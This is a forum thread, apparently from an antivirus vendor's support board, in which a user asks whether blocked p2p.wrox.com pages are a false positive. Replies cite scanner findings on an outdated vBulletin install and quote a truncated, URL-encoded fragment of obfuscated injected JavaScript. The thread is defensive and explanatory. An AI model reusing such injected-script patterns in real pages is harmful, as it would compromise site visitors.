p2p.wrox.com blocked as malicious

Dear Avast Stuff,

I’m an happy customer of your Antivirus. Thanks for this.

I’m writing here because when I try to visit this url “p2p.wrox.com/content/tags/mac”, Avast block it since contains malicious content. In particular, the message I receive is the following.

JS:Agent-ATR [Trj]

The same applies for “p2p.wrox.com/content/blogs/jminatel/new-drm-free-ebook-bundle-4-iphone-books-one-value-price”.

Since the site belongs to Wrox site, could you elaborate on this? Is this a FP?

Here Virus Total scan report 0 / 35
https://www.virustotal.com/url/aedb07014d247498d391df051e3fceb973169cea8edad446909c1c9dc590eb7f/analysis/

If the site contains malicious content. can I be sure that Avast has stopped the infection? Do I have to run a scan to be sure?

Thank you in advance.

Best regards.

IMPORTANT To prevent accidentally clicks on previous links, I removed http:// prefix.

P.S. I’m executing MBAM with Realtime protection. It doesn’t block those links as malicious.

Issue here: http://page2rss.com/2c35e5a4abff4ae67210ce5e1ae41f07
flagged is !{gzip} malcode Content after the < /html> tag should be considered suspicious.
Outdated software need updating: Application: vBulletin 3.6.8 - htxp://www.vbulletin.com/

Malware found in the URL:
htxp://p2p.wrox.com/archives/index.php
Known javascript malware.
See Details: http://sucuri.net/malware/malware-entry-mwanomalysp7
Malware Script Detector flags:

Warning:

This site URL may contain possible malicious scripts hosted or injected!

Solutions: Close this window, Disable JavaScript

Detected Malware: XSS URL Injection Malware

Source:htxp://www.google.com/search?client=broser&channel={browser:context}&q=%3C%21–+%2F+SmartSource+7±-%3E%3Cscript%3Eif+%28i5463+%3D%3D+null%29+%7B+var+i5463+%3D+1%3B+var+vst+%3D+String.fromCharCode%2868%29%2BString.fromCharCode%28111%29%2BString.fromCh&ie=utf-8&oe=utf-8&aq=t etc. etc .

So no false positive, real javascript malware…

polonus

Dear polonus,

Thanks for the reply.

Why Virus Total gives a result of 0/35?

What about the first link? I cannot understand what you mean.

Finally, and most important, do I have to run a scan to be sure I’m clean?

Thank you for your attention.

Hi rebel84,

Cnotes are notes on website software vulnerabilities, specifically for joomla etc.
In this case probably an input validation error was being abused by the attacker(s),
read: http://www.securityfocus.com/bid/29293
An exploit for which there was no vendor applied patch (credit for this goes to Ali Jasbi mentioned on securityfocus)
That is why I gave the first link, so the security aware would know where to look and saw the pending threat of the VBulletin weakness.
I give it here in my reply as you specifically asked about the issue…

About the scan, I would not worry one bit, blocked by avast shield these binairies have not even reached your machine, so you are being protected and fully secure thanks to the avast shields. “Chapeau” again to the added protection from avast shields…

polonus

Thank you very much for your reply.

Why Virus Total gives a result of 0/35?
VirusTotal URL scan is a reputation scan..... it does not scan for malware

unless you download it and scan :wink:
https://www.virustotal.com/file/2eecdd6df714a6d488921a9c9effdf84626cdb35ef63a9ea4997b4a88b358962/analysis/1358983816/

Sucuri
http://sitecheck.sucuri.net/results/p2p.wrox.com

Thank you for your reply.